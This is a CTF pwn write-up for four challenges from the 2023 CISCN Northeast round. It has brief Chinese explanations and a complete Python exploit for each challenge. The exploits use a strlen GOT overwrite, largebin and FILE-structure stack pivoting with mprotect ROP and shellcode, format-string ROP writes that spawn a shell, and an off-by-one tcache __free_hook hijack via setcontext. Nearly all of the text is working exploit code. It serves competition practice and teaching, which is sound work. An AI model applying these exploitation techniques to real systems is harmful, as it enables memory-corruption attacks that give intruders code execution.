CISCN东北赛区-2023-pwn-all
Novice Challenge
漏洞利用
改strlen的got表
EXP
#!/usr/bin/env python3
from pwncli import *
cli_script()  # pwncli entry: parses argv (debug / remote mode) and fills in `gift`
io: tube = gift.io        # process or remote connection
elf: ELF = gift.elf       # challenge binary
libc: ELF = gift.libc     # libc as resolved by pwncli for this run
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
    # The remote target ships its own libc; symbol lookups below must use it.
    libc = ELF("./libc.so.6")
    # NOTE(review): this indexes gift with the ELF object itself, not the string
    # "libc"; `libc`/`gift.libc` read above may still refer to the old object.
    # Confirm the intended override form against pwncli's gift API.
    gift[libc] = libc
# Challenge banner prompts: a name, then a "lucky" number.
sla('challenge!','root')
sla('luck!','17')
# Leak: take a libc pointer from the next 0x10 bytes of output and subtract the
# hard-coded offset 0x3fc10f to get the base. The offset is specific to the
# libc.so.6 above and must be re-derived for any other build.
lb = recv_current_libc_addr(0x3fc10f,0x10)
libc.address = lb
leak_ex2(lb)
# Index is sent as a decimal string; 0xffffffff+0x10 presumably relies on how the
# program parses/stores the index (not visible here) -- confirm against the binary.
off = str(0xffffffff+0x10)
sla('index>>\n',off)
sa('input>>',flat(
    {
        0:'/bin/sh;',
        0x1c:p32(0xffffff78)
    }
))
# Final write: flat() packs system's address as 8 bytes, [:-4] keeps the low 4.
# The write-up describes this step as overwriting strlen's GOT entry.
sa('bye',flat(
    libc.sym.system
)[:-4])
ia()
Quadra Two Times
漏洞利用
经典菜单，但是每个功能只能用两次，利用scanf函数让UB中的chunk进入Largebin即可。但是比赛的时候很蛋疼，本地打通了，远程没打通，我还以为是payload字节问题，搞了3个小时，换了4种写法……然后发现pwncli加载libc有点小问题，倒数8分钟极限出，拿到二血，但后果是导致比赛时没时间做剩下两题。
EXP
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:10:39
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()  # pwncli entry: parses argv (see the usage docstring above) and fills in `gift`
io: tube = gift.io        # process or remote connection
elf: ELF = gift.elf       # challenge binary
libc: ELF = gift.libc     # libc as resolved by pwncli for this run
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
def cmd(i, prompt='our choice >> '):
    """Reply to the menu prompt with option *i*, sent as a decimal line."""
    option = str(i)
    sla(prompt, option)
def add(sz):
    """Menu 1: request an allocation of *sz* bytes."""
    cmd('1')
    size_text = str(sz)
    sla('size', size_text)
def edit(i,cont):
    """Menu 3: overwrite chunk *i* with the raw bytes *cont* (sa: no newline appended)."""
    index_text = str(i)
    cmd('3')
    sla('>> ', index_text)
    sa('>>', cont)
def show(i):
    """Menu 4: print the content of chunk *i*."""
    index_text = str(i)
    cmd('4')
    sla('>> ', index_text)
def dele(i):
    """Menu 2: free chunk *i*."""
    index_text = str(i)
    cmd('2')
    sla('>> ', index_text)
# Two chunks too large for tcache/fastbin. The write-up notes every menu
# operation may be used at most twice, which is why the sequence is so tight.
add(0x420)
add(0x418)
dele(0)
# Over-long menu input (0x450 x '1'): per the write-up, this scanf read is what
# moves the freed unsorted-bin chunk into the largebin before the next free.
cmd('1'*0x450)
dele(1)
show(0)
# libc leak from the freed chunk's link field; 2018184+0x448 is a hard-coded
# offset for the libc this exploit was tuned against -- re-derive for any other build.
lb = recv_current_libc_addr(2018184+0x448,0x100)
leak_ex2(lb)
libc.address = lb
# Write into already-freed index 0 (the edit menu does not check the free state).
# 0x1ecfd0 is another libc-specific offset; the last qword points near stderr's FILE.
edit(0,flat(
    {
        0:[
            lb + 0x1ecfd0,lb + 0x1ecfd0,0,
            libc.sym._IO_2_1_stderr_ + 0x68 - 0x20
        ]
    }
))
cmd('1'*0x450)
show(0)
ru('Content: ')
# Heap leak: six raw pointer bytes, zero-extended to a qword.
leak_heap = u64_ex(r(6)+b'\x00'*2)
leak_ex2(leak_heap)
CG.set_find_area(0,1)
# ROP stage from pwncli's gadget helper: mprotect the page containing the leaked
# heap address, a ret gadget, then continue at heap+0x1a0 (where the
# edit(1, ...) below places shellcode at data offset 0x190 -- presumably
# 0x10 bytes of chunk header account for the difference).
rop_pd = flat(
    {
        0x0:[
            CG.mprotect_chain(leak_heap&(~0xfff)),
            CG.ret(),
            leak_heap + 0x1a0
        ]
    }
)
# Gadgets located by byte pattern in the loaded libc. NOTE(review): next(...) is
# the idiomatic spelling of .__next__(); either raises StopIteration when the
# pattern is absent from the libc in use, so a mismatched libc fails loudly here.
mgg1 = libc.search(asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]")).__next__()
mgg2 = libc.search(asm("mov rsp, rdx; ret")).__next__()
mgg3 = libc.search(asm("add rsp, 0x30; mov rax, r12; pop r12; ret")).__next__()
# Forged FILE structures from pwncli's IO_FILE_plus_struct. The [0x10:] slice
# drops the first 16 bytes, which is why the patch offsets below carry a -0x10.
fp = IO_FILE_plus_struct()
fsop = fp.house_of_Lys_getshell_when_exit_under_2_37(0xdeadbeef,libc.sym._IO_wfile_jumps+0x300,leak_heap)[0x10:]
# NOTE(review): `fsop`/`data` are built but never sent; only the pivot payload
# inside edit(1, ...) is used. Presumably a leftover from an earlier attempt.
data = payload_replace(fsop,{
    0x38-0x10:mgg1,
    0xa0-0x10:0xdeadbeef,
    0x48-0x10:leak_heap + 0x100
    }
)
# Index 1: pivot FILE payload at offset 0, cat-flag shellcode at 0x190.
edit(1,flat(
    {
        0:[
            fp.house_of_Lys_stack_pivoting_when_exit_between_2_30_and_2_36(leak_heap,libc.sym._IO_wfile_jumps+0x300,rop_pd,mgg1,mgg2,mgg3)[0x10:]
        ],
        0x190:asm(shellcraft.cat('/flag'))
    }
))
# Menu option 5 -- presumably exit, which the helper names above target.
cmd('5')
leak_ex2(mgg1)
ia()
'''
mov rbp, qword ptr [rdi + 0x48];
mov rax, qword ptr [rbp + 0x18];
lea r13, [rbp + 0x10];
mov dword ptr [rbp + 0x10], 0;
mov rdi, r13;
call qword ptr [rax + 0x28];'''
'''
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x04 0xc000003e if (A != ARCH_X86_64) goto 0006
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0005
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0005: 0x25 0x00 0x01 0x00000110 if (A <= 0x110) goto 0007
0006: 0x06 0x00 0x00 0x00000000 return KILL
0007: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0009
0008: 0x06 0x00 0x00 0x00000000 return KILL
0009: 0x15 0x00 0x05 0x00000000 if (A != read) goto 0015
0010: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count)
0011: 0x15 0x00 0x04 0x00000000 if (A != 0x0) goto 0016
0012: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count)
0013: 0x15 0x00 0x02 0x00000000 if (A != 0x0) goto 0016
0014: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0015: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0017
0016: 0x06 0x00 0x00 0x00000000 return KILL
0017: 0x06 0x00 0x00 0x7fff0000 return ALLOW
allow:exit_group
ban:openat
'''
repeater
漏洞利用
格式化字符串改链在栈上写rop链后,利用ret2csu的部分gadget劫持printf函数结束时的程序流到rop链
EXP
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:17:17
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()  # pwncli entry: parses argv (see the usage docstring above) and fills in `gift`
io: tube = gift.io        # process or remote connection
elf: ELF = gift.elf       # challenge binary
libc: ELF = gift.libc     # libc as resolved by pwncli for this run
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
    libc = ELF("./libc-2.31.so")
    # NOTE(review): keyed by the ELF object rather than the string "libc";
    # `libc`/`gift.libc` read above may still refer to the old object. Confirm
    # the intended override form against pwncli's gift API.
    gift[libc] = libc
# Round 1: have the program print stack slots 11 and 13 as pointers, separated
# by '-' so the reply can be split on read.
sa('length:',str(0x400))
pd = flat(
    {
        0:'%11$p-%13$p'
    }
)
sa('the content: ',pd)
# Slot 11 is a return address into libc (the stack dump at the end of this file
# shows __libc_start_main+243); 0x24083 is its offset in libc-2.31 only.
lb = int(ru('-')[:-1],16) - 0x24083
libc.address = lb
# Slot 13 is a stack address; read up to 'P' (presumably the next prompt).
stack = int(ru('P')[:-1],16)
attack_stack = stack -0xe8
# NOTE(review): `ogg` and `attack_libc` are computed but never used in this
# script -- leftovers from an alternative approach.
ogg = 0xe3b01 + lb
leak_ex2(lb)
leak_ex2(attack_stack)
attack_libc = lb + 0x1ec040
# Address targeted by the closing write in fmt_attack (derived from the leak).
val_i_addr = stack - 0x30 -0xe8
leak_ex2(attack_stack)  # NOTE(review): duplicate of the print two lines above
def fmt_attack(va,attack_stack):
    """Write the low byte of *va* to address *attack_stack* via the format-string bug.

    Four request/format-string round-trips, each preceded by a 0x400 length:
      1. '%<attack_stack & 0xffff>c%28$hn'  -- plant the target's low 16 bits in
         the value behind positional argument 28 (presumably a pointer into the
         slot that argument 41 refers to);
      2. '%<va & 0xff>c%41$hhn'             -- write va & 0xff through it;
      3. '%<val_i_addr & 0xffff>c%28$hn'   -- re-point argument 28 at val_i_addr;
      4. '%41$hhn' with no output           -- write a zero byte there.
    Callers loop this over successive bytes, shifting *va* by 8 each time.

    Uses the module globals val_i_addr, sa and flat. Argument positions 28/41
    are specific to this binary's stack layout.
    """
    # NOTE: the first prompt is matched on 'length' (no colon); the rest on 'length:'.
    sa('length',str(0x400))
    pd = flat(
        {
            0:['%' + str(attack_stack&0xffff) + 'c' + '%28$hn\x00']
        }
    )
    sa('the content: ',pd)
    sa('length:',str(0x400))
    pd = flat(
        {
            0:['%' + str(va&0xff) + 'c' + '%41$hhn\x00']
        }
    )
    sa('the content: ',pd)
    sa('length:',str(0x400))
    pd = flat(
        {
            0:['%' + str(val_i_addr&0xffff) + 'c' + '%28$hn\x00']
        }
    )
    sa('the content: ',pd)
    sa('length:',str(0x400))
    pd = flat(
        {
            0:['%41$hhn\x00']
        }
    )
    sa('the content: ',pd)
sys_addr = libc.sym.system
CG.set_find_area(0,1)
sh = CG.bin_sh()
pop_rdi = CG.pop_rdi_ret()
at_addr =attack_stack
leak_ex2(pop_rdi)
# Three 6-byte values written one byte per fmt_attack round, laid out at
# at_addr, at_addr+8 and at_addr+0x10. NOTE(review): the three loops differ only
# in the value; a small helper would remove the repetition, and `i` is unused.
for i in range(6):
    fmt_attack(pop_rdi,attack_stack)
    pop_rdi = pop_rdi>>8
    attack_stack = attack_stack + 1
attack_stack = at_addr + 0x8
S()  # pwncli helper; presumably a pause for attaching a debugger -- confirm
for i in range(6):
    fmt_attack(sh,attack_stack)
    sh = sh>>8
    attack_stack = attack_stack + 1
attack_stack = at_addr + 0x10
for i in range(6):
    fmt_attack(sys_addr,attack_stack)
    sys_addr = sys_addr>>8
    attack_stack = attack_stack + 1
# Final step: change the low byte of a saved return address (0x38 below the
# leaked frame) to 0xea -- presumably matching ...13EA, the pop-register gadget
# in the disassembly note below. Both the 0x38 and 0xea are tied to this binary.
attack_ret = stack - 0x38 - 0xe8
leak_ex2(attack_ret)
sa('length:',str(0x400))
pd = flat(
    {
        0:['%' + str(attack_ret&0xff) + 'c' + '%28$hhn\x00']
    }
)
sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
    {
        0:['%' + str(0xea) + 'c' + '%41$hhn\x00']
    }
)
sa('the content: ',pd)
ia()
'''
.text:00000000000013E6 48 83 C4 08 add rsp, 8
.text:00000000000013EA 5B pop rbx
.text:00000000000013EB 5D pop rbp
.text:00000000000013EC 41 5C pop r12
.text:00000000000013EE 41 5D pop r13
.text:00000000000013F0 41 5E pop r14
.text:00000000000013F2 41 5F pop r15
.text:00000000000013F4 C3 retn
'''
'''
00:0000│ rsp 0x7ffec24b4808 —▸ 0x560ef5357369 ◂— jmp 0x560ef535736f
01:0008│ 0x7ffec24b4810 ◂— 0x40000000000
02:0010│ 0x7ffec24b4818 —▸ 0x560ef6a072a0 ◂— '%11$p-%13$p'
03:0018│ 0x7ffec24b4820 ◂— 0x34323031 /* '1024' */
04:0020│ 0x7ffec24b4828 ◂— 0xebcc69e4c0ca1a00
05:0028│ rbp 0x7ffec24b4830 ◂— 0x0
06:0030│ 0x7ffec24b4838 —▸ 0x7f84688f9083 (__libc_start_main+243) ◂— mov edi, eax
07:0038│ 0x7ffec24b4840 ◂— 0x100000060 /* '`' */
08:0040│ 0x7ffec24b4848 —▸ 0x7ffec24b4928 —▸ 0x7ffec24b50e8 ◂— 0x61682f656d6f682f ('/home/ha')
09:0048│ 0x7ffec24b4850 ◂— 0x168abd7a0
0a:0050│ 0x7ffec24b4858 —▸ 0x560ef535727f ◂— endbr64
0b:0058│ 0x7ffec24b4860 —▸ 0x560ef5357390 ◂— endbr64
0c:0060│ 0x7ffec24b4868 ◂— 0xb4bb42b1882ac453
0d:0068│ 0x7ffec24b4870 —▸ 0x560ef5357140 ◂— endbr64
0e:0070│ 0x7ffec24b4878 —▸ 0x7ffec24b4920 ◂— 0x1
0f:0078│ 0x7ffec24b4880 ◂— 0x0
10:0080│ 0x7ffec24b4888 ◂— 0x0
11:0088│ 0x7ffec24b4890 ◂— 0x4b46c62718aac453
12:0090│ 0x7ffec24b4898 ◂— 0x4bb393aea844c453
'''
your_note
漏洞利用
off by one改打size然后leak libc,后面都是正常操作
EXP
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 10:29:05
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()  # pwncli entry: parses argv (see the usage docstring above) and fills in `gift`
io: tube = gift.io        # process or remote connection
elf: ELF = gift.elf       # challenge binary
libc: ELF = gift.libc     # libc as resolved by pwncli for this run
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
    # NOTE(review): the file name says glibc 2.23, but comments further down
    # refer to tcache, which glibc only introduced in 2.26 -- verify which libc
    # the remote actually ships before trusting the offsets below.
    libc = ELF("./libc-2.23.so")
    # NOTE(review): keyed by the ELF object rather than the string "libc";
    # confirm the intended override form against pwncli's gift API.
    gift[libc] = libc
def cmd(i, prompt='5.go out for happy\n'):
    """Send menu choice *i* once the last menu line *prompt* has been seen."""
    selection = str(i)
    sla(prompt, selection)
def add(i,sz,cont='/bin/sh\x00'):
    """Menu 1: create note *i* of *sz* bytes holding *cont* (default "/bin/sh\\0")."""
    cmd('1')
    answers = (
        ('index?', str(i)),
        ('size?', str(sz)),
        ('content?', cont),
    )
    for prompt, reply in answers:
        sla(prompt, reply)
def edit(i,cont):
    """Menu 4: overwrite note *i* with *cont* (sent as a line)."""
    index_text = str(i)
    cmd('4')
    sla('hich index to edit?\n', index_text)
    sla('what do you want to rewrite it ?', cont)
def show(i):
    """Menu 3: print note *i*."""
    index_text = str(i)
    cmd('3')
    sla('index?', index_text)
def dele(i):
    """Menu 2: free note *i*."""
    index_text = str(i)
    cmd('2')
    sla('which one?', index_text)
# Heap layout at indices 0..6; every note defaults to "/bin/sh\0" content.
add(0,0xf8)
add(1,0x3f8)
add(2,0xf0-0x10) #0x400 + 0xf0
add(3,0xf8)
add(4,0x3f8)
add(5,0x10)
add(6,0x10)
# Off-by-one: data offset 0xf8 of note 0 is one byte past its 0xf8 request and
# lands on the size byte of the next chunk; the write-up uses it to change
# chunk 1's recorded size.
edit(0,flat(
    {
        0xf8:p8(0xf1)
    }
))
dele(1)
# Same one-byte overflow from note 3: a fake prev_size (0x100+0x4f0) followed by
# a size byte for chunk 4.
edit(3,flat(
    {
        0xf0:[
            0x100+0x4f0,
            p8(0x20)
        ]
    }
))
#unlink
dele(4)
add(1,0x3f8)
dele(6)
add(4,0x100,'a'*8)
add(6,0x100)
#leak a libc
show(4)
# The program prints each byte XOR 0xca as decimal tokens "N^-^"; skip the
# eight 'a' bytes (ord('a') ^ 0xca == 171), then decode the next six.
#use "^0xca"
ru('171^-^171^-^171^-^171^-^171^-^171^-^171^-^171^-^')
leak_libc = b''
for i in range(6):
    data_ = int(ru('^-^')[:-3])
    leak_ex2(data_)
    data_ = (data_^0xca)&0xff
    leak_ex2(data_)
    leak_libc += p8(data_)
leak_libc = u64_ex(leak_libc)
leak_ex2(leak_libc)
# 0x3ec10a: build-specific distance from the leaked pointer to libc base.
lb = leak_libc - 0x3ec10a
libc.address = lb
leak_ex2(lb)
#hijack tcachebin fd
dele(6)
dele(4)
show(2)
#0x22
# Same decode loop with key 0x22. NOTE(review): duplicate of the loop above --
# a helper taking (count, key) would remove the repetition; `i` is unused.
leak_heap = b''
for i in range(6):
    data_ = int(ru('^-^')[:-3])
    leak_ex2(data_)
    data_ = (data_^0x22)&0xff
    leak_ex2(data_)
    leak_heap += p8(data_)
leak_heap = u64_ex(leak_heap)
attack_heap = leak_heap - 0x620 + 0x10
# Note 2 overlaps the freed chunk; its first qword (the forward pointer) is
# replaced with __free_hook.
edit(2,flat(
    {
        0:[
            libc.sym.__free_hook
        ]
    }
))
#getshell
add(6,0x100)
add(4,0x100,p64_ex(0xfbad2887))
fp = IO_FILE_plus_struct()  # NOTE(review): unused from here on
CG.set_find_area(0,1)
# ROP stage: mprotect the page containing attack_heap, a ret gadget, then continue
# at attack_heap+0xc0 where the cat-flag shellcode is written by edit(0, ...) below.
rop_chain = flat(
    {
        0:[
            CG.mprotect_chain(attack_heap&~(0xfff)),
            CG.ret(),
            attack_heap+0xc0,
        ]
    }
)
# Note 4 presumably now aliases __free_hook (second allocation from the hijacked
# tcache list); point it at setcontext+53, which per the disassembly at the end
# of this file loads rsp from [rdi+0xa0] and pushes [rdi+0xa8] as return address.
edit(4,flat({
    0x0:[
        libc.sym.setcontext + 53
    ],
    },filler = '\x00'
))
leak_ex2(leak_heap)
# Note 0 becomes the context block setcontext reads: +0xa0 = new rsp
# (attack_heap+0x20 -> rop_chain), +0xa8 = ret gadget, +0xc0 = shellcode.
edit(0,flat({
    0xa0:[
        attack_heap + 0x20,
        CG.ret(),
    ],
    0x20:rop_chain,
    0xc0:ShellcodeMall.amd64.cat_flag,
},filler = '\x00'
))
S()  # pwncli helper; presumably a pause for attaching a debugger -- confirm
# free(note 0) goes through __free_hook with rdi = note 0's data pointer.
dele(0)
ia()
'''
0x7f994b326085 <setcontext+53>: mov rsp,QWORD PTR [rdi+0xa0]
0x7f994b32608c <setcontext+60>: mov rbx,QWORD PTR [rdi+0x80]
0x7f994b326093 <setcontext+67>: mov rbp,QWORD PTR [rdi+0x78]
0x7f994b326097 <setcontext+71>: mov r12,QWORD PTR [rdi+0x48]
0x7f994b32609b <setcontext+75>: mov r13,QWORD PTR [rdi+0x50]
0x7f994b32609f <setcontext+79>: mov r14,QWORD PTR [rdi+0x58]
0x7f994b3260a3 <setcontext+83>: mov r15,QWORD PTR [rdi+0x60]
0x7f994b3260a7 <setcontext+87>: mov rcx,QWORD PTR [rdi+0xa8]
0x7f994b3260ae <setcontext+94>: push rcx
0x7f994b3260af <setcontext+95>: mov rsi,QWORD PTR [rdi+0x70]
pwndbg>
0x7f994b3260b3 <setcontext+99>: mov rdx,QWORD PTR [rdi+0x88]
0x7f994b3260ba <setcontext+106>: mov rcx,QWORD PTR [rdi+0x98]
0x7f994b3260c1 <setcontext+113>: mov r8,QWORD PTR [rdi+0x28]
0x7f994b3260c5 <setcontext+117>: mov r9,QWORD PTR [rdi+0x30]
0x7f994b3260c9 <setcontext+121>: mov rdi,QWORD PTR [rdi+0x68]
0x7f994b3260cd <setcontext+125>: xor eax,eax
0x7f994b3260cf <setcontext+127>: ret
'''